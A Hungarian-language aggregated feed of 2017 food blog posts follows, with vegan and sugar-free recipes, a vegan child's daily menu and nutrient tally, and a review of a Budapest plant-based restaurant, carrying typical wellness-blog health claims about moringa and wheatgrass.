Szóval hideg idő ide vagy oda, én bizony egy házi fagylalt receptet hozok most nektek. Az egyszerű egy hozzávalós banánfagylalt – angolul “nicecream” – titkát szerintem sokan ismeritek már, de aki még nem, annak röviden a lényeg: jó érett banánokat, meghámozva, kisebb darabokra törve a fagyasztóba teszünk egy tasakban. Ha jól megfagytak, bedobjuk a szuper turmixgépünkbe vagy aprítógépünkbe és addig dolgoztatjuk a gépet (6-8 perc), amíg a banánok krémes állagúra állnak össze. Ezt aztán bármivel ízesíthetjük, mehetnek bele fűszerek – vanília, fahéj -, más gyümölcsök, pirított vagy nyers magok, diófélék, kókuszreszelék, kakaópor, stb.
Mi most superfood-osra vettük a figurát és az ajándékba kapott moringa porból tettünk bele egy keveset. “Ez a superfood Ázsiából hódította meg a világot, ott a növény minden részét felhasználják, a gyökerétől a levelekig. Európában a növény zöld leveleiből készült őrleményt fogyasztjuk. Antioxidánsokban gazdag, sejt- és szövetvédő hatású.” (Forrás: innen). Nagyon magas a moringa fehérje tartalma. A moringa lassíthatja az öregedési folyamatokat, tisztítja a májat, szabályozza a vércukor szintet, javítja az agyfunkciókat, vérszegénység és ízületi problémák esetén is használják. Tehetjük zöld turmixokba, ihatjuk teaként, de mivel enyhe hashajtó hatása van, kezdetben csak napi 1/2-1 teáskanállal javasolt szedni – ha rendszeresen fogyasztjuk -, majd fokozatosan növelhetjük a mennyiséget, ha nem okozott gondot a kisebb mennyiség. Mi nagyon ritkán fogyasztjuk, meg ebbe a fagylaltba 2 teáskanálnyit tettünk, amit hárman ettünk meg.
Színezhetjük a fagylaltunkat acai porral lilára, céklaporral rózsaszínre, árpafűporral szintén zöldre, de tényleg ízlésünknek megfelelően bármivel ízesíthetjük ezt a nyers, vegán, feldolgozott cukortól mentes egészséges fagylaltot, ami egyébként a reggelink is lehet.
Krémes zöld banánfagylalt (laktózmentes, gluténmentes, cukormentes, vegán) Mentés Nyomtatás Előkészítési idő 3 óra Főzési idő 8 perc Teljes idő 3 óra 8 perc A világ legegyszerűbb és legegészségesebb cukormentes, vegán fagylaltja. Szerző: Zizi Recept típusa: fagylalt, reggeli, desszert Konyha: vegán, gluténmentes Adag/mennyiség: 2-3 főre Hozzávalók 3 db érett banán, meghámozva 2 teáskanál moringa por egy csipet őrölt vanília goji bogyó, kókuszchips, tálaláshoz Elkészítés A banánokat törjük kisebb darabokra. Tegyük egy tasakba a darabokat, majd mehet a mélyhűtőbe 2-3 órára. A megfagyott banán darabokat tegyük a robotgépbe/aprítógépbe a moringa porral, a vaníliával és kapcsoljuk be. Először hangos lesz, meg mozogni fog a robotgép (valahogy kezelni kell a fagyott darabkákat), de 2-3 perc múlva fagyottá áll össze az egész. Ha még 3-4 percig dolgoztatjuk a robotgépet az egész krémes lesz. Tálaljuk kis tálkákba szedve, tegyünk rá goji bogyót és kókuszchipset. Jegyzetek Granolával (ropogós müzlivel) megszórva teljesértékű reggeli lehet. 3.5.3226
Mit eszik a vegagyerek? (napi teljes menü + tápanyag bevitel kalkuláció)
2017. szeptember 18. Zizi kalandjai
Sokszor kapom meg a kérdést aggódó szülőktől, a vegán étrend iránt érdeklődőktől, hogy honnan tudom, hogy a gyermekeim elegendő tápanyagot visznek-e be és vajon mindenből megkapják-e a megfelelő mennyiséget, jut-e elég fehérje, kálcium, magnézium, vas, szelén, cink, A-vitamin, C-vitamin, stb. a szervezetükbe. Ezekre a kérdésekre mindig az a válaszom, hogy ezek miatt egyáltalán nem aggódom. Igyekszem tudatosan odafigyelve összeállítani az étrendünket, ez alapján főzni, sütni, de egy idő után ez már napi rutinná válik, olyanná, mint az autóvezetés vagy a biciklizés.
Segítségünkre lehet a kalória, a vitamin és ásványi anyag bevitel számolásában a Cronometer nevű weboldal, amelynek ingyenes részét használva naponta ki tudjuk számolni, hogy miből mennyit fogyasztottunk. Persze nem kell ezt napi szinten csinálni, hogy belezavarodjunk a végére… – de megnyugtatás képpen vagy az aggódó családtagok miatt havi egy-két alkalommal tesztelhetjük magunkat, hogy megfelelő mennyiségű tápanyagot vittek-e be a gyermekeink vagy akár mi.
Az alábbiakban bemutatom nektek fényképeken keresztül, hogy mit ettünk egy teljes napon át, a bejegyzés végén pedig a Cronometerbe felvitt adatokat és az azokból számolt tápanyag mennyiségeket láthatjátok, hogy egy 4 éves, 18 kg súlyú és 110 cm magas gyermek miből mennyit evett/ivott. Persze a számolt értékek nem tekinthetők 100%-os eredménynek, mert ugye csak kb. saccolt mennyiségeket vittem fel az egyes élelmiszerekből, meg például savanyú káposzta esetében egy adott amerikai márkájú termékből számolt adatokat a rendszer. Mindenesetre egy hozzávetőleges támpontot nyújt az eredmény. Egy ilyen számolás segítségünkre lehet akár egy teljes heti menü előre tervezéséhez is.
Természetesen minden étel vegán, nem tartalmaz semmilyen állati eredetű összetevőt!
Reggeli: egy alma és epres turmix hántolt kendermaggal megszórva
Cukifej
Ízlik a reggeli “múti”… az utolsó cseppig megiszom!
Most már tényleg semmi nem maradt a turmix tartályában!
“Anya, ez olyan finom!” (Költözködős kupi a háttérben… bocs! )
Ebéd: pirított fokhagymás füstölt tofu, pirított fokhagymás-citromos leveleskel, főtt rizs és bulgur, citromos tahini szósz
Délutáni snack no. 1.: egy alma
Délutáni snack no. 2.: nagyon finom, édes sárgadinnye…
Bratyók osztoznak a sárgadinnyén!
Délutáni snack no. 3.: almaszeletek kesudióvajba mártogatva
Délutáni snack no. 4.: friss málna a parkban
Vacsora: humuszos kovászos kenyér (Pipacs Pékség), savanyú káposzta, koktélparadicsom, újhagyma, uborka, ebédről maradék tofu és leveleskel (nincs a képen még egy szelet kenyér, ami guacamoléval – avokádókrém – volt megkenve)
És akkor íme az eredmény…
Magyarázat :
Vitaminokból (a D- és az E-vitamin kivételével) túlteljesítettük a 100%-ot.
Ásványi anyagok egy részéből is többet vittünk be, amiből kevesebbet az a vas, a magnézium, a cink (ezekből 92%-nyit) és a kálium (ebből 47%-nyit, tehát több almát és banánt kell enni másnap, hogy ezt pótoljuk ).
A nátriumot pedig jóval túlteljesítettük a napi átlagnál, de ez betudható a savanyú káposztának… ti ezen a képen nem látjátok, de egyénileg kimutatja a rendszer, hogy pl. a 264% nátrium miből jött össze és látom, hogy a savanyú káposztában található nátrium mennyiséget igen magasra értékeli. Viszont a bevitt C-vitamin mennyiség legnagyobb része a savanyú káposztából származik, tehát jó sok C-vitamin került a szervezetbe a káposztából, viszont ezzel egyidőben jó sok nátrium is.
Amit biztosan félre kalkulált a rendszer, az a 0.1 g transzzsír. Mi is az a transzzsír? “A transzzsírsavak a növényi olajok hidrogénezése során keletkező vegyületek. A kutatások kimutatják, hogy a természetben, természetes formában előforduló transzzsírsav nem okoz olyan egészségügyi kockázatot, mint a mesterséges úton előállított társai.” Megnéztem és a rendszer az 1 evőkanálnyi tahinit rakta be a zsiradékok közül a transzzsírhoz (is). Utána néztem és a nyersen krémmé darált szezámmag nem tartalmaz egészségtelen transzzsírt, szóval nem tudom miért került a Cronometer szerint ide. De ezt leszámítva, azt hiszem, hogy elégedett lehetek a végeredménnyel, mert egy vitaminokban, ásványi anyagokban, egészséges zsiradékokban (Omega-3 és Omega-6), fehérjében gazdag (!!!) napon vagyunk túl.
Persze azt is figyelembe kell venni, hogy minden nap más és más és egyik nap C-vitaminból viszünk be többet a szervezetünkbe az elfogyasztott ételekkel, másik nap meg vasból. A cél, hogy törekedjünk a harmóniára, a kigyensúlyozott táplálkozásra minden nap!
kakaós kókuszos céklás kenyér
2017. szeptember 15. Beautilicious
Imádom a kakaó, a cékla, és a kókusz ízét is, na de a három együtt még zseniálisabb. Ha valami igazán finom süteményre vágysz, próbáld ki ezt a glutén-, és cukormentes egészséges finomságot. Hozzávalók - 125gr kókuszliszt - 25gr útifű maghéj - 75gr édesítő - 50gr kakaó - 175gr cékla - 250gr görög joghurt - 150ml kókusztej Így készítsd - A céklát a joghurttal és a tejjel turmixold össze - Egy másik tálba keverd össze a száraz összetevőket - A két keveréket gyúrd össze és tedd kenyérsütő formába - Süsd 180 fokon 30 percig
Túros csokis csoda
2017. augusztus 29. Beautilicious
Nincs is jobb párosítás a túrónál és csokinál. Mindkét ízvilág nagyon finom, de a kettő együtt tarol. És ha mindez cukkíniből készül cukor és fehérliszt nélkül, neked is a kedvenc sütid lesz. HOZZÁVALÓK - 1 nagy cukkíni - 250gr krémes joghurt - 130gr zabliszt - 80gr kókuszliszt - 90gr édesítő - 30gr kakaópor - 2 tojás - szódabikarbóna - fél citrom leve - 500gr túró - 100gr tejföl - vanília aroma - reszelt citrom héja - ízlés szerint édesítő ÍGY KÉSZÍTSD - A cukkínit tisztítsd meg, majd reszeld - Keverd össze a liszteket, kakaót, az édesítőt, és a szódabikarbónát - A joghurtot keverd össze a tojásokkal és citromlével, majd nyomkodd ki a cukkínit és öntsd bele - Keverd össze a nedves és száraz hozzávalókat - Öntsd a tésztát sütőpapírral bélelt tepsibe, és süsd 180 fokon 1órát - A krémhez a túrót keverd össze a tejföllel, vaníliával, citromhéjjal és ízlés szerint édesítővel
mézes krémes, méz nélkül :)
2017. augusztus 25. Beautilicious
Ha van finom, egészséges és méz nélküli mézes krémes, akkor az ez. :) Glutén, Cukor és laktóz mentes, így ha ezt készíted egy vendégségbe, biztos, hogy nem fogsz mellé, sőt bomba biztos a siker. :D Hozzávalók - 65gr darált dió - 35gr útifűmag héj - 100gr kókuszliszt - 60gr édesítő - 200ml kókusztej - 1 tk olívaolaj - 2 sárgarépa - 2 tojás - mézeskalács fűszerkeverék, fahéj - szódabikarbóna - fél citrom leve - 100gr rizs - 2ek édesítő - vanília aroma - rum aroma - 350ml víz/ növényi tej Így készítsd - A megtisztított répát turmixold össsze a tojással, olajjal és a kókusztejjel - Egy külön edénybe keverd össze a darált diót, útifűmag héjat, a lisztet, a szódabikarbónát és a 60gr édesítőt - Ezt a két keveréket alaposan gyúrd össze , majd tedd hozzá a citromlevet - Nyomkodd a masszát sütőpapírral bélelt tepsibe és mehet a 170fokos sütőbe 20 percre - A krémhez főzz jó puhára 100gr rizst, ha majdnem kész tedd hozzá az édesítőt, vaníliát és a rumot - Ha megfőtt, turmixold le - A piskótát vágd három részre, és kettőt kenj meg krémmel, majd pakold őket egymásra
kakaós piskóta naracsos sajtkrémmel
2017. augusztus 22. Beautilicious
Egy puha piskóta, ami másnapra se szárad ki és nagyon finom. Megspékelve egy kis sajtkrémmel, ami telis tele van fehérjével...hmmm jól hangzik. Na de amilyen jól hangzik, olyan finom is. Hozzávalók - 3 tojás - 70gr eritrit - 30gr kókuszliszt - 70gr zabliszt - 25gr kakaópor - 150ml kókusztej - szódabikarbóna - fél citrom leve - vanília - 250gr kémsajt - 100gr tejföl - 2ek édesítő - 1 narancs leve - 1ek tápióka keményítő Így készítsd - A tojásokat választd ketté - A sárgájához keverd hozzá a tejet, édesítőt, vaníliát, kakaóport és a liszteket - A fehérjét verd kemény habbá, majd forgasd a liszthez - A masszát adagold tepsibe és süsd 180 fokon 15percig - A krémhez a sajtkrémet, tejfölt, narancs levet, tápiókát és az édesítőt alaposan keverd össze - Öntsd rá a tésztára és mehet vissza a sütőbe még a krém rá nem sül a tésztára. Ilyenkor a sütőt már felkapcsolhatod magasabb hőfokra.
Vegán gúrméskodás a Great Bistro-ban
2017. augusztus 18. Vegán lettem
Stőhr Gréta – a Great Bistro megálmodója, tulajdonosa és séfje – mert nagyot álmodni, és elhozta a növényi étrendesek világába a nagybetűs Gourmet fogalmát. Hiánypótlás mesterfokon! Jómagamat nem tartom gúrméfigurának, sőt inkább jellemző rám a mennyiségi mint a minőségi táplálkozás. A reggeli és esti zab valamint turmixhegyek, az ebédre összepattintott fél órás levesek, és egyszerűbb főételek dimenziójából havonta egyszer-kétszer kilépek és elmegyek feleségemmel vacsorázni. Olyan helyeket látogatunk, ahol általunk nehezebben elkészíthető fogásokat ehetünk. Számos, nagyon jó vegán étterem és kajás hely van Budapesten, de itt most valami egészen más született. Valami olyan, ami eddig még nem volt, valami tökéletes hiánypótló. Élményeim a Great Bistro-ban: Még márciusban láttak Grétáék vendégül egy degusztációs fine dining vacsorára. Illetve ne szaladjunk ennyire előre, mert csak egy vacsorára voltam hivatalos, és a franc sem gondolta, hogy Magyarország első 100%-ban növényi és gluténmentes fine dining vacsora beharangozójába és próba vacsorájába csöppenek. De így történt és totálisan el voltam ragadtatva. Először a menüsort kaptam készhez, amelyből ugyan néhány szó értelmezésével gondban voltam, viszont a felsorolás nagyon kecsegtetően hangzott. Majd következett a négyfogásos vacsora, az ízorgia pedig fogásról fogásra fokozódott és azt hittem, hogy egyenesen a mennybe kerültem. A menü egy előételből, egy levesből, egy főételből és egy csodálatos desszert válogatásból állt. Előétel Előételként marinált karotta lazac-ot szolgáltak fel remoulade mártással. A lazac-ot répával helyettesítették, amely a 24 órás pácolási folyamat hatására, mind állagában mind ízében szemtelenül hasonlított az igazi lazacra. Emellett a mártás olyan összhangot dobott a már számomra önmagában is kielégítő répaszeletekhez, amilyet addig csak nagyon kevés helyen éreztem. Leves A leves citrusos-joghurtos zellekrémleves volt. Felnőtt fejjel nagyon leveses lettem - kiváltképpen nagyon szeretem a krémleveseket -, így ezt a fogást kifejezetten vártam. Még ennyi idő után is emlékszem, ahogy minden egyes kanálnál a citrusos íz mennyire finoman kúszott végig az ízlelőbimbóimon. Tökéletesen kiegyensúlyozott volt a citrusos jelenlét a zelleres, fűszeres és joghurtos ízek kavalkádjában. Főétel Főételnek aszalt paradicsomos, édesburgonyás gnocchit szolgáltak fel parmezánropogóssal. A gnocchi - nagypapám csak lenudlizta, pedig a gnocchi mennyivel jobban cseng - ugyancsak egyik kedvenc ételem. Így ugyancsak szinte már fájdalmasnak mondható várakozással telt a leves és főétel között eltelt 4-5 perc, amíg Gréta pár szóban felvezette a következő fogást. Az előétel és a leves után ezen a ponton éreztem egy kicsi űrt. Szakmailag belekötni nem tudok és nem is a célom, ugyanakkor számomra ez az ízvilág nem adott többet, mint egy komolyabb étterem gnocchis fogása. Hozzáteszem, hogy legjobb tudomásom szerint nincs olyan vegán étterem ahol gluténmentes gnocchi-t lehet kapni. Desszert No és akkor jött a korona, a csúcs, a hovatovább, a nonplusultra, a desszert. Pisztáciába, kókuszpehelybe, aszalt áfonyába forgatott álomgombóc válogatás narancsvirágvízes joghurtöntettel, céklás-csokoládés brownie és mangós tiramisu. Ez milyen sor? Megnyílott a mennyek kapuja? Meg! Sorrendet állítani csak olyan formán tudtam a desszertek között, hogy melyik alapanyagot szeretem kevésbé. A csokoládés sütiket annyira nem csípem, így a brownie került leghátra úgy, hogy amikor megkóstoltam kis híján felkiáltottam örömömben. A céklás beütés annyira tökéletesen egészítette ki a tömény csokoládé ízét, hogy szóhoz sem jutottam. Az aranyérmet holtversenyben az álomgombóc válogatás kapta, kontra mangós tiramisu. A mangós tiramisu és a különböző köntösbe öltöztetett golyócskák a tökéletesség határát súrolták nálam. Ha nem tudnám, hogy mindennél lehet finomabbat készíteni, akkor ott leadtam volna a 10 pontot. Így csak 9,999 pontot tudtam adni a desszertekre. Is. Összességében számomra egy olyan élményt adott ez a vacsora, amelyet nem tudom ki, mikor, hol és mivel tud majd überelni. A vacsora hangulatát csak tovább emelte a Great Bistro barátságos és családias közege, valamint Gréta és Ákos minőségi és valódi jelenléte. Grétáék egyébként rendszeressé tették fine dining vacsoráikat a Great Bistro-ban minden szerda, csütörtök, péntek és szombat este. Sok sikert kívánok a versenytársaknak, hisz ahogy a bevezetőben írtam, Grétáék valami olyat tettek le az asztalra, ami ezeddig Magyarországon egyedülálló. De bármely európai, tisztán növényi ételeket felszolgáló étterme mellé odaállítanám őket bátran. Nagy büszkeség, hogy ennyire erősödünk növényi kaja fronton, mindenkinek nagy szeretettel ajánlom a Great Bistro-t. Nyitvatartás: Hétfő és kedd: 8:00 és 18:00 között nyitva. Szerdától péntekig: 8:00 és 22:00 között nyitva. Szombaton: 12:00 és 22:00 között nyitva. Vasárnap: zárva Cím: 1054 Budapest, Bank utca 6. A Great Bistro weboldala és facebook oldala.
Vegán málna fagyi Csepelen + recept
No, a nyár végére sikerül is posztolnom... :( (Úgy június végétől itt a szöveg nagyja, csak nem jutottam el a befejezéséig.) Eddig azt hittem, hogy ilyesmiért minimum a Herbaházig kell menni, vagy magamnak barkácsolni, erre ma a Karácsony Sándor utcában meglepődve látom a táblát, hogy vegán-paleo fagyi 20m... (kétszer elolvasom, hogy jól látom-e) (Spillion Kortárs Fagyizó) Visszafelé oda is ballagtunk. Málnát kértem, de a srác javasolta, hogy kóstoljak meg valami mást is, adott kóstolót, és bizony (pedig tartottam tőle) a citromos bazsalikomos is nagyszerű volt. Flóra, mint mindig, boldogan ínyenckedett, Ábel meg hősiesen küzdött egy málnával. A végén, ahogy s7okott, csak a tölcsér kellett neki. Van választék, kedves a kiszolgálás, biztosan megyünk még.. (Mi ugyan csak egyszer voltunk, de a Férj hazafelé munkából gyakran becsábul... :) ) Pedig pont a napokban jutottam el odáig, hogy a gyermekkori málnafagyi íze jött vissza házi kreálmányból. Igaz az nem vegán volt, de tegnap nagyon fini vegán málna is sikerült. Nincs fagyigépem, a Nutribullet viszont aprítja a jeget is, így a lefagyasztott hozzávalók kerülnek bele, majd 2-3 órára visszateszem a kelyhet még a mélyhűtőbe. Így még nem lesz jeges, de már formázható gombócokat kaphatunk. A nem vegán egyszerűen fagyasztott joghurt, gyümölcscukor és málna keveréke. (2 dl joghurt, 15 dkg málna, ízlés szerint 1-2 ek gyümölcscukor/sztívia...) Szerintem szójajoghurttal is működne, és ha csak sztíviát, vagy eritritet használunk hozzá, candidások is nyugodt szívvel fagyizhatnak végre. A vegán málnafagyi azért lett kókusztejszín alapú, mert Ábelnek vaníliát is akartam készíteni, így egyszerűen a végén ahhoz kevertem málnát. Mennyiséget megevett belőle a csapat. :) A rizstejszín csak azért került bele, hogy a Nutribullet tudjon dolgozni, és a kesut megdarálja, sima rizstej is alkalmas lehet, de nem volt itthon. Vegán vaníliafagylalt Hozzávalók: 200 ml fagyasztott kókusztejszín (Cocomas volt) 1,5 ek kesudió (kesu és mandula keveréke volt itthon) édesítés ízlés szerint (sztívia és némi eritrit volt) 100 ml rizstejszín 1/4 alma 1 rúd vanília kikapart bele Pár órára a kókusztejszínt a mélyhűtőbe rakjuk. A kesut összeturmixoljuk a rizstejszínnel, sztíviával, almával és vaníliával, majd hozzákeverjük a kókusztejszínt is. 2-3 órára visszatesszük a krémet a mélyhűtőbe, azután fogyasztható. A málnafagylalthoz 200 g málna került összekeverésre a vaníliafagyival. Nagyon finom! Fotó: Mutty.hu A csokis változat a Férjé, az ostyaszerűség pedig valójában egyfajta mézes keksz, de tökéletesen illik hozzá.
Tejberisz
2017. augusztus 17. Beautilicious
Változatos, tápláló és egészséges. Mi az? A válasz az isteni tejberizs, amit szinte bármivel passzol. Eheted lekvárral, magokkal... bármivel, szinte akármivel finom. Hozzávalók - 150gr barnarizs - 300gr víz - 500ml tej/növényi tej - csipet só - vanília - 2ek édesítő Így készítsd - A rizst a vízzel és a csipet sóval főzd puhára - Add hozzá az édesítőt és a vaníliát - Folyamatosan öntsd hozzá a tejet egészen addig, míg a rizs krémes állagú nem lesz - Tálald ízlésed szerint kakaóval, fahéjjal, lekvárral.....:)
Zöldségtorta
2017. augusztus 13. Gitta nyersétel blogja
Igen, nem csak édes tortát lehet készíteni, hanem sósat is, csupa zöldségből. Ugyanolyan szép színes, csak nem gyümölcsös-édes, hanem céklás, répás, fokhagymás... ugye milyen izgalmas? Korábbi zöldségtorták - ITT - és - ITT - Többféle variációban készülhet, a lényeg az, hogy az alapja tömény, napraforgómagos, sós, esetleg lehet fokhagymás vagy más intenzív fűszerrel megízesítve, esetleg chili is jöhet :) A többi rétegben inkább a zöldség dominál, esetleg egy vékony növényi sajtréteg, a tetejére szintén sajt vagy avokádó réteg kerül Fontos, hogy minden réteget alaposan nyomkodjuk bele a formába, hogy jó tömör legyen. Fontos még, hogy hagyjuk állni legalább egy órát a hűtőszekrényben, hogy szépen lehessen felvágni, szeletelni. Most egy lehetséges recept jön, de bátran lehet variálni a zöldségeket, fűszereket és a rétegek sorrendjét is. Be lehet hozni pl. a zellert, édesburgonyát, spenótot, stb... Olyan zöldségeket használjunk, ami nem áztatja el a rétegeket, nem túl lédús :) Hozzávalók: 15 dkg áztatott napraforgó mag 1 gerezd fokhagyma, 1 csipet só, bors, pirospaprika 1 evőkanál víz 30 dkg mandulasajt 30 dkg sárgarépa, 30 dkg cékla 2 evőkanál utifűmaghéj só Elkészítés: a napraforgó magot aprítógépben a fűszerekkel együtt finomra őröljük, hozzáadjuk a pici vizet, hogy összeálljon egy kisebb gombóccá. Félretesszük. A sárgarépát egy csipet sóval aprítógépben nagyon finomra aprítjuk, szinte krémes legyen. Hozzáteszünk egy csapott evőkanál utifűmaghéjt. Ugyanezt tesszük a céklával is. Ha a cékla nagyon lédús lenne, akkor hagyjuk szűrőben kb 10 percig csöpögni. Ezután tegyük hozzá az utifűmaghéjt. Mandulasajt: készítsünk mandulatejet kb 30 dkg mandulából. A visszamaradt pépet ízesítsük sóval, sörélesztő pehellyel, citromlével. Ízesíthetjük snidlinggel, vagy bármilyen zöld fűszerrel, esetleg füstölt pirospaprikával. Sütőpapírral béleljünk ki egy 18 cm-es tortaformát. Nyomkodjuk bele a napraforgómagos alapot, kanál hátuljával, vagy egy műanyag habkártyával ,,döngöljük, majd simítsuk el. Erre öntsük a céklás zöldségmasszát, ezt is alaposan nyomkodjuk le. Erre jön a sajtréteg fele (kb 15 dkg), majd a sárgarépás réteg. A tetejére ismét sajtréteg kerül. Minden réteget alaposan nyomkodjunk le. Ez fontos, mert ez szilárdítja meg a tortát. Egy órára hűtőszekrénybe tesszük, utána szépen vágható.
citromos-mákos cukkini muffin
2017. augusztus 11. Beautilicious
Egyszerűen csodás ez a cukkini. Az egyik legsokoldalúbb zöldség. Az állaga miatt tökéletes sütikbe, viszonylag semleges íze miatt pedig édesen és sósan is elkészíthető, de még önmagában is isteni, ráadásul rengeteg vitamin található benne. Használd ki, míg itt a szezonja. Hozzávalók - 1cukkini - 1citrom héja és leve - 2 tojás - 30gr útifűmaghéj - 140gr zabliszt - 60gr kókuszliszt - 60gr + 50gr édesítő - 150gr natúr joghurt - 50gr mák - szódabikarbóna - vanília Így készítsd - A megtisztított cukkinit turmixold össze a tojással és fél citrom levével és a vaníliával - Keverd össze a liszteket az útifűmag héjjal, szódabikarbónával és a 60gr édesítővel - Öntsd össze a két keveréket, majd alaposan keverd össze - A mákos részhez keverd össze a mákot a maradék édesítővel, joghurttal, a citrom héjjal és citromlével - Muffin formába adagold a tésztát, majd a mákos krémet, majd jöhet rá még egy kis tészta - Süsd előmelegített sütőben 170fokon 40percig
Nyári hűsítő zöld turmix 3 hozzávalóból (laktózmentes, gluténmentes, vegán)
2017. augusztus 7. Zizi kalandjai
Na jókor jön a hűsítő turmix recept… amikor már lehűlt a levegő! Mert persze, ahogy ez mostanában lenni szokott, ezt a bejegyzést már 4 napja írom, akkor pedig, amikor elkezdtem írni javában tombolt a hőség a lakásunkban is… na jó, most is van még 29 fok, de ez már hűvös a hét közepi hőfokhoz képest!
Szóval innentől a bejegyzés még nagyon melegben íródott! Minden nyáron eljön az a nap, amikor a lakásban 30 fok van vagy egy kicsit afölé kúszik a hőmérséklet! Nem árulok zsákbamacskát, szóval, amikor ezt a bejegyzést pötyögöm egy szál bugyiban ülök a gép előtt és egy kézzel gépelek, mert a másikkal legyezem magam. Igen, most egy szál bugyiban, kisgatyában, pelenkában, gatyában szoktunk jönni-menni a lakásban délelőtt a gyerekekkel, egészen koradélutánig, amíg ki nem szabadulunk végre a szaunából. (Ráadásul ez a félmeztelenség még praktikus is, ha szoptat az ember lánya! Éjszaka legalábbis praktikus… mert napközben rájöttem, hogy ha szem előtt van a mell, akkor túl sokszor kéri Áki, így felvettem egy trikót, hogy ne emlékeztessem őt túl gyakran a szoptatásra! Na jó, elég a mell témából, jöjjön a turmix! )
Szóval a meleg miatt hűtjük magunkat a lakásban amennyire tudjuk. Hideg turmixokat szoktunk inni reggelire. Ez a sárgás-zöldes változat ma tízóraira készült és nagyon meglepődtem, mert még Ákos is ivott belőle, aki mostanában alig fogyaszt gyümölcsöt. Szóval mindkét gyerek itta, sőt, még egy adagot kellett készítenünk, mert ők ketten megittak egy nagy pohárral és kértek még!!! Igazából két alapanyagból áll, ha a vizet nem számítjuk. Hűsít, frissít, és mindkét alapanyag magas tápértéke garantálja jóllétünket. A két hozzávaló: hideg (hűtőből kivett) őszibarack, valamint fagyasztott búzafűlé. Ha sárga húsú barackot használunk, akkor ilyen sárgás zöldes lesz a turmix, ha fehér húsút, akkor sokkal zöldebb.
És mire jó a búzafűlé? Kérdezhetitek… Hát sok mindenre:
– rendkívül gazdag vitaminokban, enzimekben
– tartalmazza az összes ismert ásványi anyagot
– tökéletes fehérjeforrás (vegetáriánusoknak, vegánoknak ezért kiváló)
– klorofilltartalma magas (oxigénbomba a sejteknek)
– antioxidáns.
Ezeken kívül erősíti az immunrendszert, növeli a vitalitást. A szervezetet fokozatosan kell hozzászokatni a búzafűhöz méregtelenítő hatása miatt. De nyilván senki nem iszik meg belőle egy litert egyszerre, ezért is szoktak juice bárokban kis kupicányi mennyiséget adni belőle. Mi kipróbálásra kaptunk ilyen búzafűlevet, amely fagyasztott (jégkocka méretű) adagokban érkezett. És hogy miért jó fagyasztott állapotban tárolni? Mert a búzafűből kipréselt lé levegővel érintkezve nagyon gyorsan veszíteni kezd értékes hatóanyagaiból, ezért fontos préselés után azonnal lefagyasztani. A hatóanyagok jégbe zárásával a búzafűlé megtartja maximális tápértékét és hatóanyagát. Ezenkívül kényelmes is, hogy kipattintunk a zacskóból néhány kockányit és már tudjuk is fogyasztani, akár vízben felolvasztva is. Mi inkább fagyasztott állapotban tettük a turmixgépbe a friss behűtött őszibarackkal, egy kevés vizet adtunk hozzá, turmixoltunk és már ittuk is a finomságot. Magában a búzafűlének édeskés íze van, de így őszibarackkal keverve inkább a barack íze dominál, tehát nem lesz zöld, fű íze, ha valaki ettől tartana!
Szezontól függően bármilyen másik gyümölccsel fogyasztva is kiváló (banán, eper, körte, stb.). Nagyon jót teszünk az egészségünkkel, ha egy kis zöldet mindig csempészünk a reggeli turmixunkba! Gondoljatok rá úgy, mintha a napi vitaminotokat vennétek be!
Érdemes a szervezetet fokozatosan hozzászoktatni a búzafűléhez. Mi már nem először ittunk, így 5 kockát beledobtunk a turmixba (hármunknak, 1 felnőtt és 2 kicsi gyerek), de ti kezdjetek 1 kockával/fő. Aztán a második hétre már 3 kockányi mehet/fő/adag.
Nyári hűsítő zöld turmix 3 hozzávalóból (laktózmentes, gluténmentes, vegán) Mentés Nyomtatás Előkészítési idő 2 perc Főzési idő 5 perc Teljes idő 7 perc Hűsít, táplál, kényeztet. Reggeli bomba turmix villámgyorsan! Szerző: Zizi Recept típusa: turmix, reggeli, ital Konyha: vegán, gluténmentes Adag/mennyiség: 2 főre Hozzávalók 4 db érett őszibarack (hűtőből kivéve), kimagozva 4-5 kocka jeges búzafűlé 100-125 ml hideg víz Elkészítés A hozzávalókat tegyük turmixgépbe, és turmixoljuk 5 percig. Először csak 100 ml vizet adjunk hozzá, fokozatosan hígítsuk többel, ha szükséges. 3.5.3226
Ádi, nehogy megidd mindet, hagyjál nekem is!
Gyors, gluténmentes, tejmentes kókuszos puliszkasüti
2017. augusztus 4. Élj harmóniában
Gyors, gluténmentes, tejmentes kókuszos puliszkasütiA kukoricadara, puliszka avagy más néven polenta, sokak nagy kedvence, mert tápláló, erősíti a testet és nagyon gyorsan elkészíthető.Ráadásul még gluténmentes is, így gm diétába is jól beilleszthető. Fogyasztható édesen és sósan is. Korábban, már tettem fel sós puliszkás receptet a blogra, egy párolt zöldséges receptet itt olvashatsz, és itt találsz egy polenta pizza receptet. Most egy édes változatot írok Nektek, amit gyakran szoktam elkészíteni:) Hozzávalók 1 csésze kukoricadara 4 csésze víz 1 csésze kókusz 1/2 csésze teljes értékű nádcukor (ízlés szerint változtatható mennyiség) vanília 4 ek. kókuszzsír (vajjal is nagyon finom) Vegyszermentes (bio) alapanyagokat használj! A vizet egy nagy edénybe forrald fel. Tedd hozzá a kókuszt, vaníliát. M ajd vedd kis lángra és keverd bele a kukoricadarát. Keverd folyamatosan - habverőt is használhatsz az elején, azzal könnyebb csomómentesre eldolgozni a kukoricadarát. Kb. 5 perc után már fakanállal is könnyedén tudod keverni. Addig főzd amíg meg nem fő, szépen elválik majd az edény falától. A végén keverd hozzá a kókuszzsírt. Egy tepsibe öntsd bele a masszát. Várd meg amíg kihűl és utána szépen szeleted fel. A receptet kiegészítheted bármilyen más aszalt gyümölccsel, dióval, mandulával, mogyoróval, kakaóval Csak a fantáziád szab határt:) tehetsz bele több cukrot vagy kevesebbet:).
szedres-kakaós mascarpone szelet
2017. augusztus 2. Beautilicious
